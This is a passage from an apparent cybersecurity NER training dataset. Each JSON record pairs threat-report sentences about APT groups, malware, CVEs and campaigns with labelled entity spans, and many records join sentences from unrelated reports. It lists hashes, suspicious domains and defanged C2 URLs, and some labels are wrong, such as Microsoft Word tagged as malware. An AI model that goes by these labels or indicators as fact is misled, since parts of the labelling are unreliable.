The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": {"Organization: Uyghur ethnic group": [[294, 313]], "Organization: Muslim minority group": [[318, 339]]}, "info": {"id": "cyberner_stix_valid_000102", "source": "cyberner_stix_valid"}} {"text": "] net app store was replaced with the malicious HenBox app ; however , some indicators point to the server running an outdated version of Apache Web Server on a Windows 32-Bit operating system . The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen” command to take a screenshot . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 .", "spans": {"Malware: HenBox": [[48, 54]], "System: Windows": [[161, 168]], "Malware: Trojan": [[199, 205]], "Malware: .NET RocketMan Trojan": [[230, 251]], "Malware: HIGHTIDE": [[422, 430]], "Indicator: .doc": [[456, 460]], "Vulnerability: CVE-2012-0158": [[486, 499]]}, "info": {"id": "cyberner_stix_valid_000103", "source": "cyberner_stix_valid"}} {"text": "Internal name : DWN_DLL_MAIN.dll File format : PE32 DLL MD5: ce8b99df8642c065b6af43fde1f786a3 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.07.28 13:05:20 ( GMT ) .", "spans": {"Indicator: DWN_DLL_MAIN.dll": [[16, 32]], "Indicator: ce8b99df8642c065b6af43fde1f786a3": [[61, 93]], "Organization: Microsoft": [[118, 127]]}, "info": {"id": "cyberner_stix_valid_000104", "source": "cyberner_stix_valid"}} {"text": "Targeting a safety system indicates significant damage and loss of human life were either intentional or acceptable goals of the attack , a consequence not seen in previous disruptive attacks such as the 2016 CRASHOVERRIDE malware that caused a power loss in Ukraine .", "spans": {"Malware: CRASHOVERRIDE": [[209, 222]]}, "info": 
{"id": "cyberner_stix_valid_000105", "source": "cyberner_stix_valid"}} {"text": "The commands supported by the most recent version of the bot are listed below . Based on the technical data uncovered , and in light of recent disclosures by the U.S. Department of Justice on the ongoing activities of Chinese state-sponsored threat actors . krjregh.sacreeflame.com lywja.healthsvsolu.com .", "spans": {"Indicator: krjregh.sacreeflame.com": [[258, 281]], "Indicator: lywja.healthsvsolu.com": [[282, 304]]}, "info": {"id": "cyberner_stix_valid_000106", "source": "cyberner_stix_valid"}} {"text": "It is important to remember there are many threat actors operating in the Middle East , and often there are overlaps in TTPs , tools , motivation , and victimology .", "spans": {}, "info": {"id": "cyberner_stix_valid_000107", "source": "cyberner_stix_valid"}} {"text": "Report_URL : https://www.secureworks.com/blog/living-off-the-land", "spans": {}, "info": {"id": "cyberner_stix_valid_000108", "source": "cyberner_stix_valid"}} {"text": "com.xiaomi.smarthome.receive_alarm Received notifications from Xiaomi ’ s smart home IoT devices . We have also observed APT41 limitedly deploy rootkits on Linux systems and Master Boot Record (MBR) bootkits , such as ROCKBOOT , on Windows systems to hide their malware and maintain persistence on victim systems . 
Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia .", "spans": {"Organization: Xiaomi": [[63, 69]]}, "info": {"id": "cyberner_stix_valid_000109", "source": "cyberner_stix_valid"}} {"text": "Indicators of compromise ( IOC ) URLs hxxp : //5.9.33.226:5416 hxxp : //172.110.10.171:85/testcc.php hxxp : //sub1.tdsworker.ru:5555/3ds/ Hash values Package.apk - A342a16082ea53d101f556b50532651cd3e3fdc7d9e0be3aa136680ad9c6a69f eCommon.dl - 604deb75eedf439766896f05799752de268baf437bf89a7185540627ab4a4bd1 This group is very active and continues to develop new features for its malware , and implement infrastructure changes in 2019 . During one reported incident , APT38 caused an outage in the bank 's essential services .", "spans": {"Organization: bank": [[497, 501]]}, "info": {"id": "cyberner_stix_valid_000110", "source": "cyberner_stix_valid"}} {"text": "It eventually kills all threads that belong to these undesired modules ( using ZwQueryInformationThread native API with ThreadQuerySetWin32StartAddress information class ) . The loader 's main goal was to run a PowerShell command to execute shellcode . Winnti : T1050 New Service . 
The script contains 1,759 lines of code .", "spans": {}, "info": {"id": "cyberner_stix_valid_000111", "source": "cyberner_stix_valid"}} {"text": "This macOS malware used public source code in order to build crafted macOS installers .", "spans": {"System: macOS": [[5, 10], [69, 74]]}, "info": {"id": "cyberner_stix_valid_000112", "source": "cyberner_stix_valid"}} {"text": "6bdfb79f813448b7f1b4f4dbe6a45d1938f3039c93ecf80318cedd1090f7e341 ADDITIONAL INFORMATION Packages monitored pin.secret.access com.chase.sig.android com.morganstanley.clientmobile.prod com.wf.wellsfargomobile com.citi.citimobile com.konylabs.capitalone com.infonow.bofa com.htsu.hsbcpersonalbanking com.usaa.mobile.android.usaa In the Naikon scheme , a C&C server can be specialized XSControl software running on the host machine . Rancor : cswksfwq.kfesv.xyz . An adversary could potentially instruct a control systems device to perform an action that will cause an Impact", "spans": {"Indicator: cswksfwq.kfesv.xyz": [[439, 457]], "Vulnerability: An adversary could potentially instruct a control systems device to perform an action that will cause an Impact": [[460, 571]]}, "info": {"id": "cyberner_stix_valid_000113", "source": "cyberner_stix_valid"}} {"text": "'' For each interaction , the malware will check if the generator is a package that belongs to the anti-virus list , the malware will abuse another feature of the Accessibility API . In 2012 , the Molerats attacks appeared to rely heavily on the XtremeRAT , a freely available tool that is popular with attackers based in the Middle East . ShadowHammer : Liveupdate_Test_VER365.zip . 
In the UK , education has suffered a significant drop in funding in the last decade , according to the non - partisan Education Policy Institute .", "spans": {"System: Accessibility API": [[163, 180]], "Indicator: Liveupdate_Test_VER365.zip": [[355, 381]], "Organization: Education Policy Institute": [[502, 528]]}, "info": {"id": "cyberner_stix_valid_000114", "source": "cyberner_stix_valid"}} {"text": "We found new variants of the Powermud backdoor , a new backdoor ( Backdoor.Powemuddy ) , and custom tools for stealing passwords , creating reverse shells , privilege escalation , and the use of the native Windows cabinet creation tool , makecab.exe , probably for compressing stolen data to be uploaded . COVELLITE remains active but appears to have abandoned North American targets , with indications of activity in Europe and East Asia .", "spans": {"Malware: Backdoor.Powemuddy": [[66, 84]], "Malware: makecab.exe": [[238, 249]]}, "info": {"id": "cyberner_stix_valid_000115", "source": "cyberner_stix_valid"}} {"text": "This content is then uploaded to a remote site outside of the compromised organization completing the attack .", "spans": {}, "info": {"id": "cyberner_stix_valid_000116", "source": "cyberner_stix_valid"}} {"text": "Command-and-Control ( C2 ) IP addresses :", "spans": {}, "info": {"id": "cyberner_stix_valid_000117", "source": "cyberner_stix_valid"}} {"text": "The target is encouraged to click on the link to read the entire article .", "spans": {}, "info": {"id": "cyberner_stix_valid_000118", "source": "cyberner_stix_valid"}} {"text": "We incorporated those changes into our build , discovering that this worked for most sample versions with almost no further modification .", "spans": {}, "info": {"id": "cyberner_stix_valid_000119", "source": "cyberner_stix_valid"}} {"text": "Using a publicly available rooting framework , the PHA attempts to root devices and gain persistence on them by reinstalling itself on the system partition of rooted device . 
During Kaspersky Lab 's analysis of NetTraveler , the company 's experts identified six victims that had been infected by both NetTraveler and Red October , which was another cyberespionage operation analyzed by Kaspersky Lab in January 2013 . On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website . Since then , Apple released a new fix for iOS , iPadOS and macOS that reliably fixes the vulnerability again .", "spans": {"Organization: Kaspersky Lab": [[182, 195], [387, 400]], "Organization: Taiwanese government": [[519, 539]], "Organization: Apple": [[702, 707]], "System: iOS": [[731, 734]], "System: iPadOS": [[737, 743]], "System: macOS": [[748, 753]]}, "info": {"id": "cyberner_stix_valid_000120", "source": "cyberner_stix_valid"}} {"text": "The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace .", "spans": {}, "info": {"id": "cyberner_stix_valid_000121", "source": "cyberner_stix_valid"}} {"text": "Although the MenuPass Group used mostly publicly available RATs , they were successful in penetrating a number of high value targets , so it is entirely possible this is indeed a continuation of past activity . 
The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated .", "spans": {}, "info": {"id": "cyberner_stix_valid_000122", "source": "cyberner_stix_valid"}} {"text": "ESET detections of Android/AdDisplay.Ashas on Android devices by country Is adware harmful ? We observed implementation of this bypass in the macro code to invoke regsvr32.exe , along with a URL passed to it which was hosting a malicious SCT file . These implants are variations of earlier forms of Bankshot , a remote access tool that gives an attacker full capability on a victim 's system .", "spans": {"Organization: ESET": [[0, 4]], "Malware: Android/AdDisplay.Ashas": [[19, 42]], "Malware: regsvr32.exe": [[163, 175]], "Malware: SCT file": [[238, 246]], "Malware: Bankshot": [[299, 307]]}, "info": {"id": "cyberner_stix_valid_000123", "source": "cyberner_stix_valid"}} {"text": "This malicious APK is 334326 bytes file , MD5 : 0b8806b38b52bebfe39ff585639e2ea2 and is detected by Kaspersky Lab products as “ Backdoor.AndroidOS.Chuli.a ” . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload . 
In addition to stealing keystrokes , Naikon also intercepted network traffic .", "spans": {"Organization: Kaspersky Lab": [[100, 113]], "Vulnerability: zero-day exploit": [[196, 212]]}, "info": {"id": "cyberner_stix_valid_000124", "source": "cyberner_stix_valid"}} {"text": "period of IRCService start @ hide Hide implant icon @ unhide Unhide implant icon @ run Execute specified shell @ broadcast Send command to the second module @ echo Write specified message to log @ install Download and copy specified component to the system path The implant uses a complex intent-based communication mechanism between its components to broadcast commands : Approximate graph of relationships between BusyGasper components Second ( main ) module This module writes a log of the command execution history to the file named “ lock ” , which is later exfiltrated The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 . APT33 : 5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f S-SHA2 Notestuk/TURNEDUP . None Enablement and usage of SQL extended stored procedures for Windows shell command execution : PIEHOP ( filename : r3_iec104_control.exe ) ( MD5 : cd8f394652db3d0376ba24a990403d20 ) is a disruption tool written in Python and packaged with PyInstaller version 2.1 + that has the capability to connect to a user supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": {"Organization: McAfee Advanced Threat Research": [[579, 610]], "Malware: data-gathering implant": [[648, 670]], "Malware: 5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f S-SHA2 Notestuk/TURNEDUP": [[716, 805]]}, "info": {"id": "cyberner_stix_valid_000126", "source": "cyberner_stix_valid"}} {"text": "Also of note is Bouncing Golf ’ s possible connection to a previously reported mobile cyberespionage campaign that researchers named Domestic Kitten . 
Securelist believe the attacks are launched by an APT Group we track under the codename \" ScarCruft \" . In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations . \" So far we do n't have data that the attackers stole from common users but we do have at least two incidents when Winnti malware had been planted on an online game update server and", "spans": {"Malware: Bouncing Golf": [[16, 29]], "Malware: Domestic Kitten": [[133, 148]], "Malware: Winnti malware": [[540, 554]]}, "info": {"id": "cyberner_stix_valid_000127", "source": "cyberner_stix_valid"}} {"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . The main command and control ( C&C ) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP , specifically to a MikroTik router running a firmware version released in March 2016 .", "spans": {"Vulnerability: CVE-2012-0158": [[79, 92]], "Malware: Microsoft Word": [[104, 118]], "Malware: MikroTik": [[265, 273]]}, "info": {"id": "cyberner_stix_valid_000128", "source": "cyberner_stix_valid"}} {"text": "It also targets devices made by Chinese manufacturer Xiaomi and those running MIUI , an operating system based on Google Android made by Xiaomi . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . 
In August 2013 , FireEye reported that admin@338 had been using the Poison Ivy RAT in its operations .", "spans": {"Organization: Xiaomi": [[53, 59], [137, 143]], "System: MIUI": [[78, 82]], "System: Google Android": [[114, 128]], "Malware: TajMahal": [[183, 191]], "Organization: FireEye": [[295, 302]], "Malware: Poison Ivy RAT": [[346, 360]]}, "info": {"id": "cyberner_stix_valid_000129", "source": "cyberner_stix_valid"}} {"text": "Israeli media published the first reports about the social networking and social engineering aspects of this campaign . According to our estimations , this group has been active for several years and specializes in cyberattacks against the online video game industry . This thread implements the main code , responsible for the entire botnet DLL . Up until now , we ’ve been relatively lucky – our most recent examples of social network - based cybercrime reveal threat actors using relatively mild motives ( monetization ) .", "spans": {"Organization: online video game industry": [[240, 266]], "Malware: botnet": [[335, 341]]}, "info": {"id": "cyberner_stix_valid_000130", "source": "cyberner_stix_valid"}} {"text": "Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including military .", "spans": {"Organization: Kaspersky": [[0, 9]], "Vulnerability: Adobe Flash Player zero-day vulnerability": [[43, 84]], "Vulnerability: CVE-2016-4117": [[87, 100]], "Malware: Epic Turla": [[235, 245]], "Organization: military": [[324, 332]]}, "info": {"id": "cyberner_stix_valid_000131", "source": "cyberner_stix_valid"}} {"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . 
For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically .", "spans": {"Vulnerability: CVE-2017-0199": [[65, 78]], "Organization: gaming companies": [[170, 186]]}, "info": {"id": "cyberner_stix_valid_000132", "source": "cyberner_stix_valid"}} {"text": "Conclusion The “ Corona Updates ” app had relatively low downloads in Pakistan , India , Afghanistan , Bangladesh , Iran , Saudi Arabia , Austria , Romania , Grenada , and Russia . Kaspersky Lab 's research team responded to three financial institutions in Russia that were infected with the GCMAN malware . . Most organizations receive and make use of intelligence published from third parties such as government agencies , specialist providers or collaborative groups .", "spans": {"Organization: Kaspersky Lab": [[181, 194]], "Organization: financial institutions": [[231, 253]], "Organization: government agencies": [[403, 422]], "Organization: specialist providers": [[425, 445]], "Organization: collaborative groups": [[449, 469]]}, "info": {"id": "cyberner_stix_valid_000133", "source": "cyberner_stix_valid"}} {"text": "Bitdefender researchers have identified a new Android spyware , dubbed Triout , which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications . In late July , SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education , job openings , real estate and semiconductors in South Korea . 
Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system .", "spans": {"Organization: Bitdefender": [[0, 11]], "System: Android": [[46, 53]], "Malware: Triout": [[71, 77]], "Organization: education": [[331, 340]], "Organization: job openings": [[343, 355]], "Organization: real estate": [[358, 369]], "Organization: semiconductors": [[374, 388]], "Malware: Carbanak": [[406, 414]]}, "info": {"id": "cyberner_stix_valid_000134", "source": "cyberner_stix_valid"}} {"text": "July 7 Three exploits – two for Flash Player and one for the Windows kernel—were initially found in the information dump . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . considering each block and instruction addresses . Standard file deletion commands are available on most operating system and device interfaces to perform cleanup , but adversaries may use other tools as well .", "spans": {"System: Flash Player": [[32, 44]], "System: Windows": [[61, 68]], "Organization: banks": [[181, 186]], "Organization: e-payment": [[189, 198]], "Organization: financial institutions": [[211, 233]], "Vulnerability: Carbanak": [[283, 291]], "Organization: adversaries": [[474, 485]]}, "info": {"id": "cyberner_stix_valid_000135", "source": "cyberner_stix_valid"}} {"text": "The HenBox app downloaded in May 2016 , as described in Table 1 below , masquerades as a legitimate version of the DroidVPN app by using the same app name “ DroidVPN ” and the same iconography used when displaying the app in Android ’ s launcher view , as highlighted in Figure 2 below Table 1 . Winnti's mode of operation: to collect information on the organizational charts of companies , on cooperating departments , on the IT systems of individual business units , and on trade secrets , obviously . 
They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors .", "spans": {"System: DroidVPN": [[157, 165]], "System: Android": [[225, 232]], "Organization: charts of companies": [[369, 388]], "Organization: individual business units": [[441, 466]], "Organization: financial": [[557, 566]], "Organization: economic": [[569, 577]], "Organization: trade policy": [[582, 594]], "Malware: RATs": [[632, 636]], "Malware: Poison Ivy": [[645, 655]], "Malware: non-public backdoors": [[671, 691]]}, "info": {"id": "cyberner_stix_valid_000136", "source": "cyberner_stix_valid"}} {"text": "Services can perform long-running operations in the background and does not need a user interface . As part of their phishing campaigns , silence still uses Microsoft Office documents with macros or exploits , CHM files , and .LNK shortcuts as malicious attachments . Flying Kitten was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of government and foreign espionage targets .", "spans": {"Organization: government": [[406, 416]]}, "info": {"id": "cyberner_stix_valid_000137", "source": "cyberner_stix_valid"}} {"text": "This suggests that the Snake Wine group will likely continue to escalate their activity and persistently target both private and government entities within Japan . 
Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": {"Organization: government entities": [[129, 148]], "Indicator: document malware": [[190, 206]], "Organization: Tibetan non-governmental organizations": [[226, 264]], "Organization: NGOs": [[267, 271]], "Organization: Falun Gong": [[293, 303]], "Organization: Uyghur groups": [[308, 321]]}, "info": {"id": "cyberner_stix_valid_000138", "source": "cyberner_stix_valid"}} {"text": "In light of this , we believe an attack against unpatched vulnerabilities is a reasonable conjecture for how the server was compromised . The usage of KopiLuwak , a well-known and exclusive artefact previously used by the Turla group , makes us attribute this campaign to this actor with high confidence . FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset .", "spans": {"Vulnerability: unpatched vulnerabilities": [[48, 73]], "Organization: FireEye": [[306, 313]], "Malware: RIPTIDE": [[339, 346]], "Malware: HIGHTIDE": [[350, 358]]}, "info": {"id": "cyberner_stix_valid_000139", "source": "cyberner_stix_valid"}} {"text": "Shortly after releasing information on their espionage operations , our friends at TrendMicro found evidence that the operators were not only conducting classic strategic espionage but targeting SCADA systems as well . In addition to these , the Animal Farm attackers used at least one unknown , mysterious malware during an operation targeting computer users in Burkina Faso .", "spans": {"Organization: TrendMicro": [[83, 93]], "Organization: users": [[354, 359]]}, "info": {"id": "cyberner_stix_valid_000140", "source": "cyberner_stix_valid"}} {"text": "Another novelty is a VPN-related package , which is based on OrbotVPN . 
The spear phishing emails used in the known attacks by the Callisto Group were so convincing that even skilled and alert users would likely have attempted to open the malicious attachment . This spear phish contained a malicious Word document that exploited CVE-2012-0158 . Cloud API APT29 has leveraged the Microsoft Graph API to perform various actions across Azure and M365 environments .", "spans": {"System: OrbotVPN": [[61, 69]], "Vulnerability: CVE-2012-0158": [[330, 343]], "System: Microsoft Graph API": [[380, 399]], "System: Azure and M365 environments": [[434, 461]]}, "info": {"id": "cyberner_stix_valid_000141", "source": "cyberner_stix_valid"}} {"text": "Monitor and remove any unauthorized code present in any www directories .", "spans": {}, "info": {"id": "cyberner_stix_valid_000142", "source": "cyberner_stix_valid"}} {"text": "All of the URLs reference the file “ mms.apk ” and all use the domain “ XXXX.ru ” , which belongs to a top five shared hosting platform in Russia ( the domain itself has been obfuscated to anonymize the provider ) . The primary operational technique used by Night Dragon comprised a variety of hacker tools , including privately developed and customized RAT tools that provided complete remote administration capabilities to the attacker . Some static information about SFX are : New variants based on leaked code are becoming more common We have continued seeing various malicious campaigns since the start of 2023 , where the threat actors have used new ransomware variants based on leaked source code or builders .", "spans": {}, "info": {"id": "cyberner_stix_valid_000143", "source": "cyberner_stix_valid"}} {"text": "In this case , the attacker can get the list of all installed apps and then remotely launch the victim ’ s app of their choice to either steal credentials or perform malicious actions ( e.g . 
Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . The use of decoy documents also reveals some of the potential targets of the Lazarus group 's malicious activity , specifically the use spear phishing attacks observed targeting South Korean government and aerospace organizations .", "spans": {"Malware: spam emails": [[212, 223]], "Organization: banks": [[288, 293]], "Malware: decoy documents": [[374, 389]], "Organization: government": [[554, 564]], "Organization: aerospace organizations": [[569, 592]]}, "info": {"id": "cyberner_stix_valid_000144", "source": "cyberner_stix_valid"}} {"text": "Stage 5 : The final loader takes control The stage 5 malware is needed only to provide one more layer of obfuscation , through the VM , of the final malware payload and to set up a special Structured Exception Hander routine , which is inserted as Wow64PrepareForException in Ntdll . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 . The Internal name of this DLL is a randomly looking CLSID and it only exports one function called DllEntry . 
When exploiting these flaws , the threat actor almost always deploys a tunneling tool , the most common of which are Fast Reverse Proxy Client FRPC and Plink .", "spans": {"Vulnerability: flaws": [[678, 683]]}, "info": {"id": "cyberner_stix_valid_000145", "source": "cyberner_stix_valid"}} {"text": "“ Pulling Back the Curtains on EncodedCommand PowerShell Attacks ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000146", "source": "cyberner_stix_valid"}} {"text": "We labeled this new variant XLoader version 7.0 , because of the different deployment method and its use of the native code to load the payload and hide in Instagram and Tumblr profiles . The use of BLACKCOFFEE demonstrates APT17 's evolving use of public websites to hide in plain sight . If a query with the M action returns an IP address that is not 99.250.250.199 , the malware will use ping mode . In mid - June 2023 , KillNet announced that the collective and actors claiming to be from the Russian ransomware group REvil were collaborating in a joint operation targeting Western financial systems .", "spans": {"Malware: XLoader": [[28, 35]], "Organization: Instagram": [[156, 165]], "Organization: Tumblr": [[170, 176]], "Indicator: 99.250.250.199": [[353, 367]], "Organization: Western financial systems": [[578, 603]]}, "info": {"id": "cyberner_stix_valid_000147", "source": "cyberner_stix_valid"}} {"text": "FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors . 
Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software , retrofitted with code used for command and control .", "spans": {"Organization: restaurant": [[79, 89]], "Organization: services": [[92, 100]], "Organization: financial sectors": [[105, 122]], "Organization: Mandiant": [[195, 203]]}, "info": {"id": "cyberner_stix_valid_000148", "source": "cyberner_stix_valid"}} {"text": "Furthermore , conflating adversaries with tools , since tools can be repurposed or used by other entities than those first observed deploying them , leads to further potential confusion as the “ X actor ” is quickly compressed in the minds of some to refer to any and all instantiations of tool “ X ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000149", "source": "cyberner_stix_valid"}} {"text": "EventBot permissions EventBot ’ s permissions as seen in the manifest file . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory . The Lotus Blossom actors using Emissary have been active for at least seven years in Southeast Asia .", "spans": {"Malware: EventBot": [[0, 8], [21, 29]], "Malware: makeself.sh": [[77, 88]], "Malware: shell script": [[100, 112]], "Malware: Emissary": [[220, 228]]}, "info": {"id": "cyberner_stix_valid_000150", "source": "cyberner_stix_valid"}} {"text": "Intezer has evidence dating back to September 2018 which shows Pacha Group has been using a cryptomining malware that has gone undetected on other engines . 
As shown above , the threat runs several native binaries to collect useful information for its recon phase .", "spans": {"Organization: Intezer": [[0, 7]], "Malware: native binaries": [[198, 213]]}, "info": {"id": "cyberner_stix_valid_000151", "source": "cyberner_stix_valid"}} {"text": "In particular , this second group also has the capability of dumping users ' credentials using the same technique employed by Mimikatz . The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": {"Organization: government institutions": [[259, 282]], "Organization: embassies": [[285, 294]], "Organization: oil and gas industry": [[301, 321]], "Organization: military contractors": [[343, 363]], "Organization: activists": [[368, 377]]}, "info": {"id": "cyberner_stix_valid_000152", "source": "cyberner_stix_valid"}} {"text": "Once infected njRAT communicates to the attacker and allows the attacker to log keystrokes , upload/download files , access victims web camera , audio recording , steal credentials , view victims desktop , open reverse shell etc .", "spans": {"Malware: njRAT": [[14, 19]]}, "info": {"id": "cyberner_stix_valid_000153", "source": "cyberner_stix_valid"}} {"text": "Take steps to secure Windows systems , such as installing and configuring Microsoft 's Enhanced Mitigation Experience Toolkit ( EMET ) and Microsoft AppLocker .", "spans": {"Organization: Microsoft": [[74, 83], [139, 148]]}, "info": {"id": "cyberner_stix_valid_000154", "source": "cyberner_stix_valid"}} {"text": "Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier . 
With the recent arrests of actors using the Lurk banking trojan , Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software .", "spans": {"Malware: date string": [[35, 46]], "Malware: date codes": [[64, 74]], "Malware: Lurk banking trojan": [[192, 211]], "Organization: banks": [[294, 299]]}, "info": {"id": "cyberner_stix_valid_000155", "source": "cyberner_stix_valid"}} {"text": "Once archive is loaded , the application uses reflection api to call methods from the class names specified in the json . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . DustySky ( called \" NeD Worm \" by its developer ) is a multi-stage malware in use since May 2015 .", "spans": {"Vulnerability: CVE-2017-0144": [[254, 267]], "Malware: errr.aspx": [[316, 325]], "Malware: DustySky": [[337, 345]], "Malware: NeD Worm": [[357, 365]]}, "info": {"id": "cyberner_stix_valid_000156", "source": "cyberner_stix_valid"}} {"text": "The Zen trojan uses its root privileges to turn on accessibility service ( a service used to allow Android users with disabilities to use their devices ) for itself by writing to a system-wide setting value enabled_accessibility_services . The attack wave started in late July 2011 and continued into midSeptember 2011 . Both Japan and Taiwan are important intelligence collection targets for China , particularly because of recent changes to Japan ’s pacifist constitution and the upcoming Taiwanese election . 
Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": {"Malware: Zen": [[4, 7]], "System: Android": [[99, 106]]}, "info": {"id": "cyberner_stix_valid_000157", "source": "cyberner_stix_valid"}} {"text": "In contrast however , for OnionDuke and MiniDuke the linked image files contain embedded malware to be downloaded and executed , rather than instructions .", "spans": {"Malware: OnionDuke": [[26, 35]], "Malware: MiniDuke": [[40, 48]]}, "info": {"id": "cyberner_stix_valid_000158", "source": "cyberner_stix_valid"}} {"text": ", kernel32.dll , advapi32.dll , and version.dll ) and remapping them in memory . The Magic Hound attack campaign is an active and persistent espionage motivated adversary operating in the Middle East region . OceanLotus Steganography Malware Analysis White Paper . Eventually , when the DLL is copied into its final path , rundll32.exe is used to call the exported function SetQueryNetSessionCount , which downloads the next stage .", "spans": {"Malware: DLL": [[287, 290]]}, "info": {"id": "cyberner_stix_valid_000159", "source": "cyberner_stix_valid"}} {"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . 
One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" .", "spans": {"Malware: Documents": [[0, 9]], "Vulnerability: Flash exploit": [[19, 32]], "Indicator: thanks.pps": [[173, 183]], "Indicator: request.docx": [[247, 259]]}, "info": {"id": "cyberner_stix_valid_000160", "source": "cyberner_stix_valid"}} {"text": "Microsoft is aware of the outstanding local privilege escalation vulnerability in Windows ( CVE-2015-1701 ) .", "spans": {"Organization: Microsoft": [[0, 9]], "System: Windows": [[82, 89]], "Vulnerability: CVE-2015-1701": [[92, 105]]}, "info": {"id": "cyberner_stix_valid_000161", "source": "cyberner_stix_valid"}} {"text": "SUSPECTED DETECTION TESTS BY THE THREAT ACTOR In searching for EventBot , we ’ ve identified multiple submissions from the same submitter hash , 22b3c7b0 : EventBot 22b3c7b0 submitter hash The 22b3c7b0 submitter hash that submitted most of the EventBot samples to VirusTotal . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware . 
The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"Malware: EventBot": [[63, 71], [156, 164], [244, 252]], "Malware: Ursnif": [[353, 359]], "Malware: Urlzone": [[364, 371]], "Organization: CrowdStrike": [[545, 556]], "Organization: dissidents": [[611, 621]]}, "info": {"id": "cyberner_stix_valid_000162", "source": "cyberner_stix_valid"}} {"text": "Additionally , a specific loader is often associated with the MiniDuke toolset and is referred to as the “ MiniDuke loader ” .", "spans": {"Malware: MiniDuke": [[62, 70], [107, 115]]}, "info": {"id": "cyberner_stix_valid_000163", "source": "cyberner_stix_valid"}} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story .", "spans": {"Vulnerability: Carbanak": [[20, 28]], "Organization: financial industry": [[145, 163]], "Organization: customers": [[187, 196]], "Vulnerability: CVE-2012-0773": [[203, 216]]}, "info": {"id": "cyberner_stix_valid_000164", "source": "cyberner_stix_valid"}} {"text": "If a smartphone or tablet was released more than a year ago , it is probably no longer supported by the manufacturer and patching of vulnerabilities is no longer provided . They used an exploit of Internet Information Server to inject keylogger and backdoor malware onto the Exchange server . The numbering on each arrow corresponds to the chronological sequence of events . 
